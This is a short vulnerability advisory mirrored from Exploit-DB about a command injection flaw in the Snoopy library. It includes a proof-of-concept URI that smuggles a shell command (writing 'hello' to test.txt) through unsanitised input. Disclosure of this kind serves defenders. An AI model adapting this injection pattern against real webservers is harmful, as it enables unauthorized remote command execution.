exploit-db-mirror/exploits/windows/remote/26424.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

10 lines
No EOL
489 B
Text

source: https://www.securityfocus.com/bid/15213/info
Snoopy is prone to a vulnerability that lets attackers execute arbitrary commands because the application fails to properly sanitize user-supplied input.
This issue may facilitate unauthorized remote access to the application in the context of the webserver.
https://www.%22;+echo+'hello'+%3E+test.txt
Passing this URI to a script that uses a vulnerable version of Snoopy will result in a file called 'test.txt' containing 'hello'.